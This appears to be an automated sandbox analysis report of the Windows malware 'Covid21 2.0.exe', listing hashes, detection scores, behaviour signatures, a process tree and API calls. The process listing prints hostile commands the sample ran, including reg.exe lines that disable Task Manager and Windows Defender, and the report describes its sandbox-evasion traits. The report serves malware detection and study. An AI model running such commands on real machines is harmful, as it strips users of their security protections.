Play interactive tour

Edit tour

Analysis Report Covid21 2.0.exe

Overview

General Information

Sample Name:	Covid21 2.0.exe
Analysis ID:	377010
MD5:	a7c7f5e792809db8653a75c958f82bc4
SHA1:	7ebe75db24af98efdcfebd970e7eea4b029f9f81
SHA256:	02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca
Infos:
Most interesting Screenshot:

Detection

Score:	75
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Command shell drops VBS files

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Disables the Windows task manager (taskmgr)

Found API chain indicative of debugger detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample or dropped binary is a compiled AutoHotkey binary

Uses cmd line tools excessively to alter registry or file data

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Startup

System is w10x64

Covid21 2.0.exe (PID: 5888 cmdline: 'C:\Users\user\Desktop\Covid21 2.0.exe' MD5: A7C7F5E792809DB8653A75C958F82BC4)

cmd.exe (PID: 4564 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cscript.exe (PID: 4064 cmdline: cscript prompt.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)

reg.exe (PID: 3164 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

reg.exe (PID: 5984 cmdline: Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

CLWCP.exe (PID: 852 cmdline: clwcp c:\covid21\covid.jpg MD5: E62EE6F1EFC85CB36D62AB779DB6E4EC)

reg.exe (PID: 3088 cmdline: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)

wscript.exe (PID: 1724 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 1380 cmdline: C:\Windows\system32\cmd.exe /K coronaloop.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Corona.exe (PID: 5424 cmdline: c:\covid21\corona.exe MD5: 6374CA8AD59246DFED4794FD788D6560)

timeout.exe (PID: 2420 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

inv.exe (PID: 4744 cmdline: inv.exe MD5: EBB811D0396C06A70FE74D9B23679446)

wscript.exe (PID: 4168 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

timeout.exe (PID: 4692 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

z.exe (PID: 6192 cmdline: z.exe MD5: A7CE5BEE03C197F0A99427C4B590F4A0)

wscript.exe (PID: 6228 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

timeout.exe (PID: 6248 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

mlt.exe (PID: 6488 cmdline: mlt.exe MD5: A4E26D32F9655DBE8EFD276A530EB02B)

wscript.exe (PID: 6508 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

timeout.exe (PID: 6520 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

wscript.exe (PID: 6708 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

icons.exe (PID: 6732 cmdline: icons.exe MD5: 3CA1D5768C2944D4284B1541653823C7)

conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 6780 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

screenscrew.exe (PID: 5592 cmdline: screenscrew.exe MD5: E87A04C270F98BB6B5677CC789D1AD1D)

wscript.exe (PID: 3880 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe

Avira: detection malicious, Label: HEUR/AGEN.1133501

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	ReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Metadefender: Detection: 36%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Show sources

Source: Covid21 2.0.exe	Virustotal: Detection: 69%	Perma Link
Source: Covid21 2.0.exe	Metadefender: Detection: 29%	Perma Link
Source: Covid21 2.0.exe	ReversingLabs: Detection: 75%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Covid21 2.0.exe

Joe Sandbox ML: detected

Source: 0.2.Covid21 2.0.exe.63145a.3.unpack

Avira: Label: TR/Patched.Ren.Gen

Source: Covid21 2.0.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00408604 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\covid21\Corona.exe	Code function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423D09 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,

Source: z.exe.0.dr	String found in binary or memory: http://www.autohotkey.com
Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000000.248581249.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr	String found in binary or memory: http://www.autohotkey.comCould
Source: screenscrew.exe, 00000025.00000002.353059310.000000000043B000.00000004.00020000.sdmp	String found in binary or memory: http://www.rjlsoftware.com
Source: screenscrew.exe, 00000025.00000002.354713453.0000000002090000.00000004.00000001.sdmp	String found in binary or memory: http://www.rjlsoftware.com(
Source: screenscrew.exe	String found in binary or memory: http://www.rjlsoftware.com/?screenscrew
Source: screenscrew.exe, 00000025.00000003.289298313.0000000002090000.00000004.00000001.sdmp	String found in binary or memory: http://www.rjlsoftware.com/?screenscrewopenj

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_00443AE3 GetTickCount,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_004218AC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_00420B07 GetForegroundWindow,GetWindowRect,_strrchr,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,DeleteObject,SelectObject,DeleteDC,DeleteObject,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_00435EB4 GetKeyboardState,

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Code function: 0_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,_strncoll,GetFocus,SendMessageA,GetPropA,

Spam, unwanted Advertisements and Ransom Demands:

Contains functionalty to change the wallpaper

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_0046CF80 RegOpenKeyExA,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegFlushKey,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,

System Summary:

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Window found: window name: AutoHotkey

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00405B1F GetPropA,DefFrameProcA,SetLastError,NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00439164 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0045543C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0042E49C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00449828 GetSubMenu,SaveDC,RestoreDC,73BBB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\covid21\Corona.exe	Code function: 12_2_00432908 NtdllDefWindowProc_A,GetCapture,KiUserCallbackDispatcher,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044CEA8 NtdllDefWindowProc_A,
Source: C:\covid21\Corona.exe	Code function: 12_2_004421FC GetSubMenu,SaveDC,RestoreDC,73BBB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\covid21\Corona.exe	Code function: 12_2_0042738C NtdllDefWindowProc_A,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\covid21\Corona.exe	Code function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044A410 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00424BF0 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0043F764 GetSubMenu,SaveDC,RestoreDC,73BBB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0042FFB8 NtdllDefWindowProc_A,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_00428F5C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0042220A NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_00422218 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0042E808 NtdllDefWindowProc_A,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_004234E7: CreateFileA,DeviceIoControl,CreateFileA,DeviceIoControl,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

File created: C:\Windows\clwcp.bmp

Jump to behavior

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00406960
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00458A98
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0044EE08
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00465050
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00449828
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00463A68
Source: C:\covid21\Corona.exe	Code function: 12_2_004421FC
Source: C:\covid21\Corona.exe	Code function: 12_2_004473A0
Source: C:\covid21\Corona.exe	Code function: 12_2_0041B3AA
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00444908
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_0043F764
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_004075C4
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0040DE8C
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00458854
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0044207B
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00414803
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_004071FF
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0044522E
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0044B395
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00421466
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00452C20
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042F514
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00450529
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00449D8E
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042963D
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0040CF24
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0041B735
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0044179A
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: 37_2_0042E58C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe 13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: String function: 004036E8 appears 117 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: String function: 00403E10 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: String function: 00405E68 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: String function: 00442502 appears 290 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: String function: 00439871 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: String function: 00458250 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: String function: 00442545 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: String function: 0044C37D appears 49 times
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: String function: 0046AF31 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: String function: 0040621C appears 62 times
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: String function: 0040411C appears 74 times
Source: C:\covid21\Corona.exe	Code function: String function: 00403E4C appears 70 times
Source: C:\covid21\Corona.exe	Code function: String function: 00405ED4 appears 61 times

Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Corona.exe.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: Covid21 2.0.exe, 00000000.00000002.313236805.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.313236805.0000000000D90000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamescreenscrew.exe: vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp	Binary or memory string: OriginalFilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.313123480.0000000000D30000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Covid21 2.0.exe

Source: Covid21 2.0.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Source: Covid21 2.0.exe

Static PE information: Section: UPX1 ZLIB complexity 0.999160245797

Source: classification engine

Classification label: mal75.rans.evad.winEXE@65/18@0/0

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_0041EC2C GetLastError,FormatMessageA,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_00408862 GetDiskFreeSpaceA,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_0042B61C CoInitialize,CoCreateInstance,GetKeyboardLayout,MultiByteToWideChar,CoUninitialize,

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Code function: 0_2_004020C9 FindResourceA,LoadResource,SizeofResource,

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4740:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01

Source: C:\Users\user\Desktop\Covid21 2.0.exe

File created: C:\Users\user\AppData\Local\Temp\2870.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' '

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\covid21\Corona.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\Covid21 2.0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Covid21 2.0.exe	Virustotal: Detection: 69%
Source: Covid21 2.0.exe	Metadefender: Detection: 29%
Source: Covid21 2.0.exe	ReversingLabs: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\Covid21 2.0.exe 'C:\Users\user\Desktop\Covid21 2.0.exe'
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
